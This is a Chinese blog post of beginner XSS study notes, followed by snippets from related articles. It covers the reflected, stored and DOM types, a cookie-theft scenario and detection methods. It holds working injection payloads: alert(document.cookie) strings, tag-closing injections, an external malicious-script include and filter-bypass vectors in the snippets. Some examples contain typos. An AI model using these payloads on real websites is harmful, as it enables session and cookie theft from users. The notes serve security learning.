闲人的XSS学习1

最新推荐文章于 2023-06-06 20:22:26 发布
最新推荐文章于 2023-06-06 20:22:26 发布
阅读量191 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/108967192
版权

概念

XSS又叫CSS,即是跨站脚本攻击。是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的恶意代码,当用户使用浏览器浏览被嵌入的恶意代码的网页时,恶意代码将会在用户的浏览器上执行。

原理

XSS一般用JavaScript编写,Javascript可以用来--------获取用户的cookie,改变网页内容,URL跳转。存在CSS漏洞,就可以盗取用户COOKIE,黑掉页面,导航到恶意网站。

例:<script>altert(/xss/)<script>, 这个代码会触发XSS攻击。

例:script src="http://www.secbug.org/x.txt"></script>,该方法可以用来加载外部脚本,而在x.txt中就存放着攻击者的恶意代码JavaScript代码,这段代码可能是用来盗取用户的Cookie,可能是监控等恶意行为。(x.txt换成x.jpg只要文件中包含JavaScript代码也会被执行。

XXS类型

XSS主要有3种类型,反射型,存储型,DOM型。

反射型
反射型XSS也被称为非持久性XSS。
①用户访问一个带有XSS代码的URL请求时,服务器端接收数据处理后。
②带有XSS代码的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,最终造成XSS漏洞。

例如:
①小明在访问A网站
②攻击者发现XXS漏洞,准备网站B
③攻击者将带有XSS漏洞的URL通过站内的信息发送小明
④小明点击了信息,cookie信息泄露
⑤攻击者通过小明的cookie登录了小明的账号

存储型XSS
存储型XSS又称为持久性XSS。
①允许用户存储数据的WEB应用程序
②攻击者提交一段XSS代码后,被服务器端储存
③当攻击者再次访问某个界面,这段XSS代码就被程序读取出来,响应给浏览器,造成XSS攻击。

例:
①确认输入点和输出点
②根据相应的标签构造HTML代码来闭合

不能得知内容输出的具体位置,则可以使用模糊测试方案。

`<script>alert(document.cookie)</script>`//普通注入

/><script>alert(document.cookie)</script> //闭合标签注入

</textarea><script>alert(document.cookie)</script>//闭合标签注入

DOM XSS
文档对象模型,DOM通常用于代表在HTML,XHTML,XML中的对象。

DOM的规定如下:
整个文档是一个文档节点;
每个HTML标签是一个元素节点;
包含在HTML元素中的文本是文本节点;
每一个HTML属性是一个属性节点;
节点与节点之间有等级关系。

(基于DOM型的XSS是不需要与服务器端交互的)

检测XSS

检测XSS一般分为两种方式,一种是手工检测,另外一种是软件自动检测;

手工检测
最重要是考虑哪里有输入,输入的数据在哪里输出。

1,可得知输出位置
输入一些敏感字符,例如< > " ’ () ,在提交请求后查看HTML源代码,看这些输入字符是否被转义。

2,无法得知输出位子
在<input**>** 标签中:

<input type="text" name="content" value="XSS Test"/>  //采用输入"/>XSS Test测试

全自动检测XSS
专业的XSS扫描器,XSSER,XSSF都是不错的选择。

闲人end
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS学习总结
ad12456的博客
03-28 1502
xss学习
XSS攻击
m0_37557930的博客
05-22 394
1、什么是XSS攻击 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 相信以上的解释也不难理解,但为了再具体些,这里举一个简单的例子,就是留言板。我们知道留言板通常的任务就是把用户留言的内容展示出来。正常情况下,用户的留言都是正常的语言文字,留言板显示的内容也就没毛病。然而这个时候如果有人不按套路
XSS漏洞
niqiu320的博客
04-22 979
xss漏洞介绍和分类 什么是XSSXSS(Cross SiteScripting)跨站脚本,较合适的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSxss分类: 反射型(非持久型): 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久性): payload被存储到数据库
Web安全深度剖析-第7章-XSS跨站脚本漏洞
LiVicto的博客
08-31 431
XSS又叫CSS(Cross Site Scripting),即跨站脚本攻击。 XSS是指攻击者在网页中嵌入客户端脚本,通常是JS恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。 可知,XSS属于客户端攻击,受害者是用户。可以通过攻击网站管理员的方式来对网站进行文件管理、数据管理等操作。 XSS原理解析 想要深入研究XSS,要精通JavaScript。JS可以用来获取用户的Cookie、改变网页内容、URL调转,那么存在XSS漏洞的网站,就可以盗取用户Cook
黑客学习-xss漏洞总结
最新发布
weixin_49349476的博客
06-06 1110
XSS攻击全称跨站脚本攻击,是一种在Web应用中常见的安全漏洞,它允许用户将恶意代码植入到Web页面中,当其他用户访问此页面时,植入的恶意脚本就会在其他用户的客户端中执行。是为了不和层叠样式表的缩写混淆,故将跨站脚本攻击缩写为XSS。导致xss漏洞存在有几个原因对用户提交的数据未进行充分验证和过滤,如未对特殊字符和标签进行转义,导致恶意脚本被注入到Web页面中。
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4768
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
Xss学习研究平台源码.zip
05-12
在“Xss学习研究平台源码.zip”这个压缩包中,包含了一个用于学习和研究XSS攻击的测试平台。这个平台可以帮助开发者、安全研究员以及对网络安全感兴趣的人员深入理解XSS的工作原理,学习如何防御这种攻击。 XSS攻击...
基于机器学习建模的 XSS 攻击防范检测.docx
05-21
基于机器学习建模的 XSS 攻击防范检测.docx
XSS学习大全
05-02
"XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的原理,掌握如何发现和修复此类漏洞,同时了解黑客如何利用它们进行攻击。通过学习,你将...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
跨站脚本(XSS)攻击
extremecold
08-12 1万+
什么是XSS 全称:Cross Site Script(跨站脚本) 为了与层叠样式表css区分,将跨站脚本简写为XSS 危害:盗取用户信息、钓鱼、制造蠕虫等。 概念:黑客通过“HTML注入”篡改网页,插入了恶意脚本,当用户在浏览网页时,实现控制用户浏览器行为的一种攻击方式。 XSS分类 存储型 反射型 DOM型...
《CTF特训营》——跨站脚本攻击(XSS
PICACHU+++的博客
07-15 2292
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
JavaScript基础
qq_41544440的博客
05-05 388
Javascript 1.基本使用 <script> alter('xxx');//内嵌式 <script> 外部式 <script src="my.js"></script> <script> // 这是一个输入框 porompt("就这") // alert 弹出警示框 输出的 展示给用户的 alert('计算的结果是'); // console 控制台
XSS学习笔记
m0_47599604的博客
03-18 575
XSS介绍以及分类 XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 分类 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
XSS跨站脚本攻击
weixin_46248422的博客
06-30 442
1.XSS是跨站脚本攻击,属于客户端攻击,受害者最终是用户,特别注意的是网站管理员也是用户之一,这就意味着XSS可以进行服务端攻击, 2.XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击脚本代码是javescript,但也会 使用其他的脚本语言。 出现的原因:程序员对输入和输出控制不严格,导致“”“精心构造”的脚本输入后,在输到前端时浏览器当做有效代码解析执行而产生。 XSS的危害:劫持用户的cookies;框架钓鱼;挂马;键盘记录; 3.xss分类pikachu里面可以进行练习:反
xss常用攻击语法
weixin_47156475的博客
08-11 2862
常用: <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <a href=javascript:alert(1)> <script>alter('dreeee')</script>; 用于探测的万能语句: <SCRscriptIPT>'"()Oonnjavascript 标签溢出: "> &lt
XSS多姿势执行alert
balance的博客
10-15 6497
以下归纳了多种执行alert函数的方式(前提是获得js执行上下文) ,可用于xss filter bypass 1、常规alert &lt;a href="javascript:alert()"&gt;XSS Test&lt;/a&gt; 2、字符串操作 Unicode字符以"\u"开头,例如\u00A9。Unicode码位用"\u{}"表示,例如\u{2F804} 十六进制以"\x"开头,
XSS注入测试
u012114090的博客
07-16 4万+
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。   XSS ...
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS攻击详解:成因、挖掘与防护
这篇由PKAV出品的教程详细讲述了XSS攻击的原理和挖掘方法,非常适合XSS学习者。 首先,我们来看XSS攻击的种类。主要分为两种:反射型XSS和存储型XSS。 反射型XSS(Non-persistent XSS)是通过诱使用户点击含有恶意...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值